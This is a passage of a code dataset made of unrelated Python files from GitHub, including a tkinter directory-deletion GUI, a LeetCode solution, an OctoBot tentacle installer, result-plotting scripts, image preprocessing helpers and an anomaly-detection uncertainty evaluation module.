logger.error(\"Main Error - Access denied, admin rights required\")\n except Exception as e:\n logger.error(str(e))\n logger.error(traceback.format_exc())\n \n\n\n\n\n\nfrom tkinter import messagebox\n\ndef deleteClick():\n reply = messagebox.askyesno(\"Important Notice\", \"Are you sure you want to delete this?\", icon ='warning')\n if reply == True:\n if clickedYes() == True:\n messagebox.showinfo('Successful','Deleted', icon='info')\n else:\n messagebox.showinfo('Error','Something went wrong, please check the logs at mainwindow or at ./Logs/tracebacklog.txt', icon ='error')\n else:\n messagebox.showinfo('Reply to deletion', 'Operation Canceled!', icon ='info')\n\n\n\n\n\n\ndef askExitYesNo():\n reply = messagebox.askyesno('Exit Confirmation', 'Do you really want to quit this application?')\n if reply == True:\n messagebox.showinfo('Exiting..', 'Click on OK to quit application')\n MainWindow.destroy()\n else:\n messagebox.showinfo('', 'Thanks for Staying')\n\n\n\n\n\n\n\n\n#------------------------------------------------------------------------------------------------------------------------\n#User interface tkinter\n\nfrom tkinter import *\nimport tkinter as tk\n\n\n\n#MainWindow\nMainWindow = Tk()\nMainWindow.title(\"Windows Troubleshooting app\")\n# photo = PhotoImage(file = \"Windows.ico\")\n# MainWindow.iconphoto(False, photo)\n\nMainWindow.geometry('400x220')\n\n\n\n\n\n#info label 1\n#create\nlbl = Label(MainWindow, text=\"Enter the directory to be deleted:\", font=(\"Arial\", 10))\n#position\nlbl.grid(column=0, row=0)\nlb2 = Label(MainWindow, text=\"Logs show below:\", font=(\"Arial\", 10))\nlb2.grid(column=0, row=2)\n#log label\nlb3 = Label(MainWindow, text=\"Last 10 lines of logs will show in this list:\", font=(\"Arial\", 10), fg=\"red\")\n#position\nlb3.grid(column=0, row=3)\n\n\n\n\n\n#path input\ntxt1 = Entry(MainWindow,width=10)\ntxt1.grid(column=1, row=0)\n\n\n\n\n#delete button\nbtn1 = Button(MainWindow, text=\"Delete\", bg=\"blue\", fg=\"white\", padx=20, pady=5, command=deleteClick)\nbtn1.grid(column=2, row=0)\n#exit button\nbtn2 = Button(\n MainWindow,\n text='Exit',\n command=askExitYesNo,\n padx=20,\n pady=5, bg=\"blue\", fg=\"white\"\n)\nbtn2.grid(column=2, row=3)\n\n\n\n\n\n#list box\nlangs = ('Java', 'C#', 'C', 'C++', 'Python',\n 'Go', 'JavaScript', 'PHP', 'Swift')\n\nlangs_var = StringVar(value=langs)\n\nlistbox = Listbox(\n MainWindow,\n listvariable=langs_var,\n height=6,\n selectmode='extended')\n\nlistbox.grid(\n column=0,\n row=4,\n sticky='nwes'\n)\n\n\n\n\n\n# link a scrollbar to a list\nvscrollbar = Scrollbar(\n MainWindow,\n orient='vertical',\n command=listbox.yview\n)\n\nhscrollbar = Scrollbar(\n MainWindow,\n orient='horizontal',\n command=listbox.xview\n)\n\nlistbox['yscrollcommand'] = vscrollbar.set\nlistbox['xscrollcommand'] = hscrollbar.set\n\nvscrollbar.grid(\n column=1,\n row=4,\n sticky='ns')\n\nhscrollbar.grid(\n column=0,\n row=5,\n sticky='ew')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nMainWindow.mainloop()\n\n\n","repo_name":"AtypicalSysAdmin/WindowsPathDeletePy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30371349138","text":"my_str = \"G()(al)\"\r\n\r\n\r\n# goal_parser = {\"()\":'o',\"(al)\":'al'} \r\n# class Solution: \r\n# def interpreter(self,command):\r\n# return command.replace(\"()\",'o').replace(\"(al)\",'al')\r\n \r\n\r\n\r\n# goal_parser = {\"()\":'o',\"(al)\":'al',\"G\":\"G\"}\r\n# class Solution:\r\n \r\n# def interpreter(self,command):\r\n# temp = \"\"\r\n# res = \"\"\r\n# for i in range(len(command)):\r\n# temp += command[i]\r\n# if temp in goal_parser:\r\n# res += goal_parser[temp]\r\n# temp = \"\"\r\n# return res\r\n \r\n \r\n\r\n\r\n# solution = Solution()\r\n# print(solution.interpreter(my_str))\r\n\r\n\r\n\r\n##practice\r\n\r\ngoal_parser = {\"()\":'o',\"(al)\":'al',\"G\":\"G\"}\r\nclass Solution:\r\n \r\n def interpreter(self,command):\r\n temp = \"\"\r\n res = \"\"\r\n for i in command:\r\n # temp += command[i]\r\n res += goal_parser.get(i,i)\r\n\r\n return res\r\n \r\n \r\n\r\nmy_str = \"G()(al)\"\r\nsolution = Solution()\r\nprint(solution.interpreter(my_str))\r\n\r\n","repo_name":"pouya-alipour741/Courses","sub_path":"Python/LeetCode_problems/GoalParser.py","file_name":"GoalParser.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13797979377","text":"import os\nimport os.path as path\nimport shutil\n\nimport octobot_commons.logging as logging\n\nimport octobot_tentacles_manager.constants as constants\nimport octobot_tentacles_manager.managers as managers\nimport octobot_tentacles_manager.util as util\n\n\nclass TentacleManager:\n\n def __init__(self, tentacle, bot_installation_path=constants.DEFAULT_BOT_PATH):\n self.tentacle = tentacle\n self.bot_installation_path = bot_installation_path\n self.target_tentacle_path = None\n\n async def install_tentacle(self, tentacle_path):\n self.target_tentacle_path = path.join(tentacle_path, self.tentacle.tentacle_type.to_path())\n tentacle_module_path = path.join(self.target_tentacle_path, self.tentacle.name)\n await self._update_tentacle_folder(tentacle_module_path)\n await managers.create_tentacle_init_file_if_necessary(tentacle_module_path, self.tentacle)\n\n async def uninstall_tentacle(self):\n shutil.rmtree(path.join(self.bot_installation_path, self.tentacle.tentacle_path, self.tentacle.name))\n\n @staticmethod\n def find_tentacles_missing_requirements(tentacle, to_install_version_by_modules, available_tentacles):\n # check if requirement is in tentacles to be installed in this call\n return {\n requirement: version\n for requirement, version in tentacle.extract_tentacle_requirements()\n if not TentacleManager.is_requirement_satisfied(requirement, version, tentacle,\n to_install_version_by_modules, available_tentacles)\n }\n\n @staticmethod\n def is_requirement_satisfied(requirement, version, tentacle, to_install_version_by_modules, available_tentacles):\n satisfied = False\n # check in to install tentacles\n if requirement in to_install_version_by_modules:\n satisfied = TentacleManager._ensure_version(tentacle.name,\n version,\n to_install_version_by_modules[requirement])\n if not satisfied:\n # check in available tentacles\n for available_tentacle in available_tentacles:\n if available_tentacle.name == requirement:\n return TentacleManager._ensure_version(tentacle.name,\n version,\n available_tentacle.version)\n return satisfied\n\n @staticmethod\n def _ensure_version(name, version, available_version):\n if version is None:\n return True\n elif version != available_version:\n logging.get_logger(TentacleManager.__name__). \\\n error(f\"Incompatible tentacle version requirement for \"\n f\"{name}: requires {version}, installed: \"\n f\"{available_version}. This tentacle might not work as expected\")\n return True\n return False\n\n async def _update_tentacle_folder(self, target_tentacle_path):\n reference_tentacle_path = path.join(self.tentacle.tentacle_path, self.tentacle.name)\n await util.find_or_create(target_tentacle_path)\n for tentacle_file_entry in os.scandir(reference_tentacle_path):\n await util.replace_with_remove_or_rename(tentacle_file_entry,\n path.join(target_tentacle_path, tentacle_file_entry.name))\n","repo_name":"Drakkar-Software/OctoBot-Tentacles-Manager","sub_path":"octobot_tentacles_manager/managers/tentacle_manager.py","file_name":"tentacle_manager.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"14939728267","text":"import numpyfy\nimport search\nimport numpy as np\nimport plotnine as plt\nimport pandas as pd\nfrom adjustText import adjust_text\n\ndpi = 300\nfileType = \".jpeg\"\nsyntheticDirectory = \"../Synthetic-Results/\"\nrealDirectory = \"../Real-World-Results/\"\n\ndef paretoFilterDict(data):\n nonDominated = dict()\n\n for algo, info in data.items():\n dist, time = info\n dominated = False\n for _ , info2 in data.items():\n dist2, time2 = info2\n # > / >= because having a higher \n # time or distance is worse\n if time >= time2 and dist >= dist2:\n if time > time2 or dist > dist2:\n dominated = True\n if not dominated:\n nonDominated[algo] = (dist, time)\n \n return nonDominated\n\ndef infoForAlg(data):\n totalAccuracy = 0\n totalTime = 0\n numPoints = 0\n\n for row in data:\n totalAccuracy += row[1]\n totalTime += row[2]\n numPoints += 1.0\n\n return (totalAccuracy / numPoints, totalTime / numPoints)\n\ndef paretoByAllData():\n s = search.Search(syntheticDirectory)\n averages = dict()\n\n for algo in numpyfy.algorithms:\n _, fileName = s.filter_by_algo(algo)\n data = np.genfromtxt(fileName, delimiter = \",\", skip_header = 1)\n averages[algo] = infoForAlg(data)\n return paretoFilterDict(averages)\n\ndef barChart(x, y, groupBy, df):\n plot = (plt.ggplot(data=df) + \n plt.aes(x=x, y=y, fill=f\"factor({groupBy})\") + \n plt.geom_bar(stat = \"identity\") + \n plt.theme(axis_text_x=plt.element_blank()) + \n plt.labs(fill = f\"{groupBy}\")\n )\n return plot\n\ndef scatterPlot(x, y, groupBy, df):\n expansion = (2,2.2)\n\n # Filters out optimal solution and \n # all variants of the linear-program \n # relaxation\n # Comment out the following code to include \n # them\n df = df[df.Algorithms != \"Opt\"]\n for postProcess in [\"Chanas\", \"Local-Search\"]:\n df = df[df.Algorithms != f\"Relaxed-Linear-Program_{postProcess}\"]\n\n adjusttext_settings = {'arrowprops': {\n 'arrowstyle': '->',\n 'color': 'black'\n }, 'expand_text' : expansion, \n 'expand_points' : expansion, \n 'expand_objects' : expansion}\n plot = (plt.ggplot(data=df) + \n plt.aes(x=x, y=y) + \n plt.geom_point(mapping = \n plt.aes(color=f\"factor({groupBy})\", \n shape=f\"factor({groupBy})\")) + \n plt.labs(color = groupBy, shape = groupBy) + \n plt.geom_text(plt.aes(label=f\"factor({groupBy})\"), \n size = 8,\n adjust_text = adjusttext_settings)\n )\n \n return plot\n\ndef paretoFilterDf(df):\n rows, columns = df.shape\n dominatedAlgorithms = list()\n\n for i in range(rows):\n dominated = False\n\n for j in range(rows):\n numWorse = 0\n numBetter = 0\n\n for k in range(1, columns):\n if df.iloc[i,k] > df.iloc[j,k]:\n numWorse += 1\n elif df.iloc[i,k] < df.iloc[j,k]:\n numBetter += 1 \n break\n\n if numWorse > 0 and numBetter == 0:\n dominated = True\n break\n\n if dominated:\n algorithm = df.iloc[i,0]\n dominatedAlgorithms.append(algorithm)\n \n for algorithm in dominatedAlgorithms:\n df = df[df.Algorithms != algorithm]\n\n return df\n \n\ndef normalizedData(df):\n minScore = df.min()[1]\n df['DISTANCE'] = df['DISTANCE'] / minScore \n df.columns = ['Algorithms','Cost', 'Time (CPU Seconds)']\n return df\n\ndef dictToDfFormat(data):\n out = list()\n\n for algorithm, info in data.items():\n dist, time = info\n out.append([algorithm, dist, time])\n return out\n\ndef collapseDuplicates(df):\n # Value is a tuple: totalDist, totalTime, number of data-points\n includedAlgorithms = dict()\n \n rows, _ = df.shape \n\n for i in range(0,rows):\n algorithm = df.iloc[i,0]\n\n if algorithm not in includedAlgorithms:\n includedAlgorithms[algorithm] = (df.iloc[i,1], df.iloc[i,2], 1)\n else:\n dist, time, num = includedAlgorithms[algorithm]\n\n distTotal = dist + df.iloc[i,1]\n timeTotal = time + df.iloc[i,2]\n \n includedAlgorithms[algorithm] = (distTotal, timeTotal, num + 1)\n\n toConvert = dict()\n for algorithm, info in includedAlgorithms.items():\n dist, time, num = info \n # To ensure float division\n num = float(num)\n toConvert[algorithm] = (dist / num, time / num)\n \n header = df.columns.values.tolist()\n return pd.DataFrame(dictToDfFormat(toConvert), columns=header)\n\n\ndef fileComparison(fileName, folder):\n # Handles spaces\n sep=\"\\\\s*,\\\\s*\"\n engine = \"python\"\n data = pd.read_csv(f\"{folder}{fileName}\", sep=sep, engine=engine)\n data = normalizedData(data)\n data = collapseDuplicates(data)\n data = paretoFilterDf(data)\n\n x = \"Cost\"\n y = \"Time (CPU Seconds)\"\n groupBy = \"Algorithms\"\n label = fileName[:len(fileName) - 4]\n\n outputLabel = f\"{label}{fileType}\"\n scatterPlot(x, y, groupBy, data).save(f\"scatter_{outputLabel}\")\n \n \"\"\" barChart(groupBy, x, groupBy, data).save(f\"{x}_bar_{outputLabel}\")\n barChart(groupBy, y, groupBy, data).save(f\"{y}_bar_{outputLabel}\") \"\"\"\n\n\ndef overallComparison():\n paretoOptimal = paretoByAllData()\n data = pd.DataFrame(dictToDfFormat(paretoOptimal), columns=[\"ALGORITHM\", \"DISTANCE\", \"TIME\"])\n data = normalizedData(data)\n\n x = \"Average Cost\"\n y = \"Average Time (CPU Seconds)\"\n groupBy = \"Algorithms\"\n data.columns = [groupBy, x, y]\n\n scatterPlot(x,y,groupBy,data).save(f\"Overall Algorithm Comparison{fileType}\")\n\n\ndef perfByParamPlot(parameter):\n data = numpyfy.tidydf(parameter)\n\n # Convert to costs normalized by optimal\n minScore = data.min()[2]\n data['Average Kendall-Tau Distance'] = data['Average Kendall-Tau Distance'] / minScore\n data.columns = [\"Algorithms\", parameter, \"Average Cost\", \"Average Time (CPU Seconds)\"]\n\n paramValues = numpyfy.listByParam(parameter)\n\n # Scatter Plots for algorithm comparison\n for value in paramValues:\n if parameter == \"n\":\n toPlot = data[data.n == value]\n elif parameter == \"N\":\n toPlot = data[data.N == value]\n elif parameter == \"th\":\n toPlot = data[data.th == value]\n elif parameter == \"k\":\n toPlot = data[data.k == value]\n\n # Pareto Filtering\n toPlot = toPlot.drop(columns=[parameter])\n toPlot = paretoFilterDf(toPlot)\n\n plot = scatterPlot(\"Average Cost\", \"Average Time (CPU Seconds)\", \"Algorithms\", toPlot)\n plot.save(f\"{parameter}-{value}_scatter{fileType}\")\n\n\nif __name__ == '__main__':\n overallComparison()\n syntheticFiles = [\"mallows_topk_n50_N5000_th0.001_k45.csv\",\n \"mallows_topk_n30_N500_th0.01_k15.csv\",\n \"mallows_topk_n10_N50_th0.1_k2.csv\"]\n for name in syntheticFiles:\n fileComparison(name, syntheticDirectory)\n\n realFiles = [\"CED-00010-00000046.csv\"]\n \n for name in realFiles:\n fileComparison(name, realDirectory)\n\n for param in [\"n\", \"N\", \"th\", \"k\"]:\n perfByParamPlot(param)","repo_name":"ammareltigani/top-lists-aggregation","sub_path":"code/visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30819567541","text":"import os\n\nimport cv2\nfrom cleanvision.imagelab import Imagelab\n\nfrom utils import costants\n\n\ndef analyze_quality_of_images(path_ds):\n \"\"\"\n Analyses the overall quality of the dataset by looking\n for things like duplicates, blurry images, and dark images.\n\n Args:\n path_ds (str): path of the dataset\n \"\"\"\n imagelab = Imagelab(data_path=path_ds)\n\n # imagelab.list_possible_issue_types()\n # imagelab.list_default_issue_types()\n\n imagelab.find_issues()\n imagelab.report()\n\n\n\n\n\ndef create_downsampled_ds(original_ds_path, new_dataset_path, downsample_dimensions):\n \"\"\"\n Creates a downsampled version of a given dataset.\n\n Args:\n - original_ds_path (str): path of the original dataset\n we want to downsample\n - new_dataset_path (str): path of the new downsampled\n dataset\n - downsample_dimensions (Tuple): dimensions of the new\n downsampled images\n\n Returns: None\n \"\"\"\n if not os.path.exists(new_dataset_path):\n os.mkdir(new_dataset_path)\n\n for image_name in os.listdir(original_ds_path):\n if \".png\" in image_name:\n print(image_name)\n original_image = cv2.imread(os.path.join(original_ds_path, image_name))\n downsampled_image = cv2.resize(original_image, downsample_dimensions)\n cv2.imwrite(os.path.join(new_dataset_path, image_name), downsampled_image)\n\n\n\ndef rename_images_hr2():\n ds_path = costants.ORIGINAL_DS_TEST\n for image_name in os.listdir(ds_path):\n if \".png\" in image_name:\n num_image = image_name.split(\"x\")[0]\n new_name = num_image + \".png\"\n print(os.path.join(ds_path, image_name),\n os.path.join(ds_path, image_name))\n os.rename(\n src=os.path.join(ds_path, image_name),\n dst=os.path.join(ds_path, new_name)\n )\n\n\n\ndef rename_images_x8():\n ds_path = costants.LR_VAL\n for image_name in os.listdir(ds_path):\n if \".png\" in image_name:\n num_image = image_name.split(\".\")[0]\n new_name = num_image + \"x4(x8).png\"\n print(os.path.join(ds_path, image_name),\n os.path.join(ds_path, image_name))\n os.rename(\n src=os.path.join(ds_path, image_name),\n dst=os.path.join(ds_path, new_name)\n )\n\n\n\n\n\ndef main():\n pass\n\nif __name__==\"__main__\":\n main()\n","repo_name":"williamdevena/Image_Super_Resolution","sub_path":"utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30502427368","text":"import t\n\n@t.parse(\"multidef.fa\")\ndef test_multi(handle):\n recs = list(t.nebfa.parse(handle))\n t.eq(len(recs), 2)\n first(recs[0])\n second(recs[1])\n\ndef first(rec):\n t.eq(rec.meta, {\n 'ids': [\n ('gi', '15674171'),\n ('ref', 'NP_268346.1'),\n ('gi', '116513137'),\n ('ref', 'YP_812044.1'),\n ('gi', '125625229'),\n ('ref', 'YP_001033712.1'),\n ('gi', '13878750'),\n ('sp', 'Q9CDN0.1|RS18_LACLA'),\n ('gi', '122939895'),\n ('sp', 'Q02VU1.1|RS18_LACLS'),\n ('gi', '166220956'),\n ('sp', 'A2RNZ2.1|RS18_LACLM'),\n ('gi', '12725253'),\n ('gb', 'AAK06287.1|AE006448_5'),\n ('gi', '116108791'),\n ('gb', 'ABJ73931.1'),\n ('gi', '124494037'),\n ('emb', 'CAL99037.1')\n ],\n 'desc': [\n '30S ribosomal protein S18 [Lactococcus lactis subsp. lactis Il1403]',\n '30S ribosomal protein S18 [Lactococcus lactis subsp. cremoris SK11]',\n '30S ribosomal protein S18 [Lactococcus lactis subsp. cremoris MG1363]',\n 'RecName: Full=30S ribosomal protein S18',\n 'SSU ribosomal protein S18P [Lactococcus lactis subsp. cremoris SK11]'\n ]\n })\n t.eq(rec.id, ('gi', '15674171'))\n t.eq(rec.desc, \"30S ribosomal protein S18 [Lactococcus lactis subsp. lactis Il1403]\")\n t.eq(rec.sequence, ''.join(\"\"\"\n MAQQRRGGFKRRKKVDFIAANKIEVVDYKDTELLKRFISERGKILPRRVTGTSAKNQ\n RKVVNAIKRARVMALLPFVAEDQN\n \"\"\".split()))\n t.eq(rec.hash, \"C53CFB6A15CBD598154C31B396F57B917222EA2D\")\n\ndef second(rec):\n t.eq(rec.meta, {\n 'ids': [\n ('gi', '66816243'),\n ('ref', 'XP_642131.1'),\n ('gi', '1705556'),\n ('sp', 'P54670.1|CAF1_DICDI'),\n ('gi', '793761'),\n ('dbj', 'BAA06266.1'),\n ('gi', '60470106'),\n ('gb', 'EAL68086.1')\n ],\n 'desc': [\n 'calfumirin-1 [Dictyostelium discoideum AX4]',\n 'RecName: Full=Calfumirin-1; Short=CAF-1',\n 'calfumirin-1 [Dictyostelium discoideum]'\n ]\n })\n t.eq(rec.id, ('gi', '66816243'))\n t.eq(rec.desc, 'calfumirin-1 [Dictyostelium discoideum AX4]')\n t.eq(rec.sequence, ''.join(\"\"\"\n MASTQNIVEEVQKMLDTYDTNKDGEITKAEAVEYFKGKKAFNPERSAIYLFQVYDKDNDGKITIKELA\n GDIDFDKALKEYKEKQAKSKQQEAEVEEDIEAFILRHNKDDNTDITKDELIQGFKETGAKDPEKSANF\n ILTEMDTNKDGTITVKELRVYYQKVQKLLNPDQ\n \"\"\".split()))\n t.eq(rec.hash, \"7D6B32F721E2E8BF34A37015C11E3FBAA0C791B8\")\n","repo_name":"ekspiulo/nebfa","sub_path":"test/test-multi-def.py","file_name":"test-multi-def.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26943845129","text":"import random\r\nimport requests \r\nfrom bs4 import BeautifulSoup \r\n\r\nURL = 'https://www.enchantedlearning.com/wordlist/adjectives.shtml'\r\nr = requests.get(URL) \r\n\r\nsoup = BeautifulSoup(r.content, 'html.parser') \r\n\r\nadjectives = (soup.find(id=\"main-content\").get_text(\" \"))\r\n\r\nlistofwords = adjectives.split(\" \")\r\n\r\nwhile '' in listofwords:\r\n listofwords.remove('')\r\n\r\nnewAdjectives = listofwords[18::]\r\n\r\nfor words in newAdjectives:\r\n if len(words) == 1:\r\n newAdjectives.remove(words)\r\n\r\nfor a in range(0,int(input(\"How many facts would you like today?\"))):\r\n Sen1 = (\"The Boyd Orr is\")\r\n num2 = random.randrange(0,len(newAdjectives))\r\n print(Sen1+ ' '+ newAdjectives[num2])","repo_name":"pyMurphy/hacker-olympics-2019","sub_path":"Krishang/BoydOrr.py","file_name":"BoydOrr.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72697613867","text":"import datetime\n\nimport numpy as np\n\nfrom baetorch.baetorch.evaluation import (\n concat_ood_score,\n evaluate_random_retained_unc,\n evaluate_misclas_detection,\n convert_hard_pred,\n summarise_retained_perf,\n evaluate_retained_unc_v2,\n calc_auroc,\n)\nfrom baetorch.baetorch.models_v2.outlier_proba import BAE_Outlier_Proba\nfrom baetorch.baetorch.models_v2.vae import VAE\nfrom uncertainty_ood.exceed import calc_exceed\nfrom uncertainty_ood_v2.util.get_predictions import flatten_nll, calc_e_nll\nfrom util.evaluate_ood import evaluate_bce_se\nfrom util.exp_manager import ExperimentManager\n\n\ndef evaluate_ood_unc(\n bae_model,\n x_id_train,\n x_id_test,\n x_ood_test,\n exp_name,\n exp_params,\n nll_key=\"nll\",\n eval_ood_unc=False,\n cdf_dists=[\"norm\", \"uniform\", \"ecdf\"],\n norm_scalings=[True, False],\n ret_flatten_nll=True,\n exp_man=None,\n round_deci=0,\n hard_threshold=0.5,\n):\n # === PREDICTIONS ===\n bae_id_pred = bae_model.predict(x_id_test, select_keys=[nll_key])\n bae_ood_pred = bae_model.predict(x_ood_test, select_keys=[nll_key])\n\n # get ood scores\n e_nll_id = flatten_nll(bae_id_pred[nll_key]).mean(0)\n e_nll_ood = flatten_nll(bae_ood_pred[nll_key]).mean(0)\n var_nll_id = flatten_nll(bae_id_pred[nll_key]).var(0)\n var_nll_ood = flatten_nll(bae_ood_pred[nll_key]).var(0)\n\n eval_auroc = {\n \"E_AUROC\": calc_auroc(e_nll_id, e_nll_ood),\n \"V_AUROC\": calc_auroc(var_nll_id, var_nll_ood),\n }\n\n if exp_man is None:\n exp_man = ExperimentManager()\n res = exp_man.concat_params_res(exp_params, eval_auroc)\n exp_man.update_csv(exp_params=res, csv_name=exp_name + \"AUROC.csv\")\n\n # special case for evaluating bce vs mse\n if (\n bae_model.likelihood == \"gaussian\"\n and not bae_model.twin_output\n and bae_model.homoscedestic_mode == \"none\"\n ) or bae_model.likelihood == \"bernoulli\":\n eval_auroc_bce_se = evaluate_bce_se(bae_model, x_id_test, x_ood_test)\n if exp_man is None:\n exp_man = ExperimentManager()\n res = exp_man.concat_params_res(exp_params, eval_auroc_bce_se)\n exp_man.update_csv(exp_params=res, csv_name=exp_name + \"BCE_VS_SE.csv\")\n\n # === EVALUATE OUTLIER UNCERTAINTY ===\n if eval_ood_unc:\n # convert to outlier probability\n # 1. get reference distribution of NLL scores\n bae_id_ref_pred = bae_model.predict(x_id_train, select_keys=[nll_key])\n\n all_y_true = np.concatenate(\n (np.zeros_like(e_nll_id), np.ones_like(e_nll_ood))\n ).astype(int)\n all_var_nll_unc = np.concatenate((var_nll_id, var_nll_ood))\n concat_e_nll = concat_ood_score(e_nll_id, e_nll_ood)[1]\n\n # 2. define cdf distribution of OOD scores\n for cdf_dist in cdf_dists:\n bae_proba_model = BAE_Outlier_Proba(\n dist_type=cdf_dist,\n norm_scaling=True,\n fit_per_bae_sample=False if isinstance(bae_model, VAE) else True,\n )\n bae_proba_model.fit(bae_id_ref_pred[nll_key])\n\n for norm_scaling in norm_scalings:\n id_proba_mean, id_proba_unc = bae_proba_model.predict(\n bae_id_pred[nll_key], norm_scaling=norm_scaling\n )\n ood_proba_mean, ood_proba_unc = bae_proba_model.predict(\n bae_ood_pred[nll_key], norm_scaling=norm_scaling\n )\n\n # CONVERT HARD PRED\n all_proba_mean = np.concatenate((id_proba_mean, ood_proba_mean))\n all_hard_proba_pred = convert_hard_pred(\n all_proba_mean, p_threshold=hard_threshold\n )\n all_hard_proba_pred_ex = convert_hard_pred(\n concat_e_nll, p_threshold=np.max(e_nll_id)\n )\n # EXCEED UNCERTAINTY\n all_exceed_unc = calc_exceed(\n len(calc_e_nll(bae_id_ref_pred)),\n all_proba_mean,\n # all_hard_proba_pred,\n all_hard_proba_pred_ex,\n contamination=0.0,\n )\n\n # Evalute uncertainty performances\n retained_percs = [0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\n\n # Evaluate retained performance\n retained_varnll_res = evaluate_retained_unc_v2(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n all_y_true=all_y_true,\n all_unc=all_var_nll_unc,\n )\n\n retained_exceed_res = evaluate_retained_unc_v2(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n # all_hard_pred=all_hard_proba_pred_ex,\n all_y_true=all_y_true,\n all_unc=all_exceed_unc,\n round_deci=round_deci,\n )\n\n retained_random_res = evaluate_random_retained_unc(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n all_y_true=all_y_true,\n repetition=10,\n retained_percs=retained_percs,\n )\n\n # evaluate misclassification detection\n misclas_varnll_res = evaluate_misclas_detection(\n all_y_true,\n all_hard_proba_pred,\n all_var_nll_unc,\n return_boxplot=True,\n )\n misclas_exceed_res = evaluate_misclas_detection(\n all_y_true,\n all_hard_proba_pred,\n # all_hard_proba_pred_ex,\n all_exceed_unc,\n return_boxplot=True,\n )\n\n # Save all results in dicts\n retained_res_all = {}\n misclas_res_all = {}\n retained_res_all.update(\n {\n \"varnll\": retained_varnll_res,\n \"exceed\": retained_exceed_res,\n \"random\": retained_random_res,\n }\n )\n\n misclas_res_all.update(\n {\n \"varnll\": misclas_varnll_res,\n \"exceed\": misclas_exceed_res,\n }\n )\n\n for proba_unc_key in [\"epi\", \"alea\", \"total\"]:\n all_proba_unc = np.concatenate(\n (id_proba_unc[proba_unc_key], ood_proba_unc[proba_unc_key])\n )\n retained_prob_unc_res = evaluate_retained_unc_v2(\n all_outprob_mean=concat_e_nll,\n all_hard_pred=all_hard_proba_pred,\n all_y_true=all_y_true,\n all_unc=all_proba_unc,\n round_deci=round_deci,\n )\n\n misclas_prob_unc_res = evaluate_misclas_detection(\n all_y_true,\n all_hard_proba_pred,\n all_proba_unc,\n return_boxplot=True,\n )\n\n retained_res_all.update(\n {\"proba-\" + proba_unc_key: retained_prob_unc_res}\n )\n misclas_res_all.update(\n {\"proba-\" + proba_unc_key: misclas_prob_unc_res}\n )\n\n # Save uncertainty evaluation results in CSV\n if exp_man is None:\n exp_man = ExperimentManager()\n unc_method = {\"dist\": cdf_dist, \"norm\": norm_scaling}\n base_method_columns = exp_man.concat_params_res(exp_params, unc_method)\n pickle_retained = exp_man.encode(\n exp_man.concat_params_res(\n exp_params,\n unc_method,\n {\"restype\": \"retained\", \"date\": datetime.datetime.now()},\n )\n )\n pickle_misclas = exp_man.encode(\n exp_man.concat_params_res(\n exp_params,\n unc_method,\n {\"restype\": \"misclas\", \"date\": datetime.datetime.now()},\n )\n )\n\n for unc_method_name in retained_res_all.keys():\n summary_ret_res = summarise_retained_perf(\n retained_res_all[unc_method_name], flatten_key=True\n )\n retained_csv = exp_man.concat_params_res(\n base_method_columns,\n {\"unc_method\": unc_method_name},\n summary_ret_res,\n )\n exp_man.update_csv(\n retained_csv,\n insert_pickle=pickle_retained,\n csv_name=exp_name + \"retained_perf.csv\",\n )\n exp_man.encode_pickle(pickle_retained, data=retained_res_all)\n\n # handle misclas results\n for unc_method_name in misclas_res_all.keys():\n misclas_csv = exp_man.concat_params_res(\n base_method_columns,\n {\"unc_method\": unc_method_name},\n misclas_res_all[unc_method_name][\"all_err\"],\n )\n exp_man.update_csv(\n misclas_csv,\n insert_pickle=pickle_misclas,\n csv_name=exp_name + \"misclas_perf.csv\",\n )\n exp_man.encode_pickle(pickle_misclas, data=misclas_res_all)\n\n # return results\n if ret_flatten_nll and eval_ood_unc:\n return (e_nll_id, e_nll_ood, var_nll_id, var_nll_ood), (\n eval_auroc,\n retained_res_all,\n misclas_res_all,\n )\n elif ret_flatten_nll and not eval_ood_unc:\n return (e_nll_id, e_nll_ood, var_nll_id, var_nll_ood), (eval_auroc, {}, {})\n elif not ret_flatten_nll and eval_ood_unc:\n return (bae_id_pred, bae_ood_pred), (\n eval_auroc,\n retained_res_all,\n misclas_res_all,\n )\n else:\n return (bae_id_pred, bae_ood_pred), (eval_auroc, {}, {})\n","repo_name":"bangxiangyong/bae-anomaly-uncertainty","sub_path":"strathclyde_analysis_v2/evaluate_outlier_uncertainty.py","file_name":"evaluate_outlier_uncertainty.py","file_ext":"py","file_size_in_byte":10468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"71518722346","text":"'''functional tests for survey app'''\nfrom urllib.parse import urlparse\nfrom time import sleep\nfrom functools import wraps\n\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom django.conf import settings\nfrom django.urls import reverse\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException, ElementClickInterceptedException, NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n\nfrom . import factory\nfrom ..models import Question, QuestionTypes, SurveyResponse\n\n\ndef wrap_in_wait(func, retires=5):\n @wraps(func)\n def wrapper(*args, **kwargs):\n return wait(func, *args, retires=retires, **kwargs)\n return wrapper\n\ndef 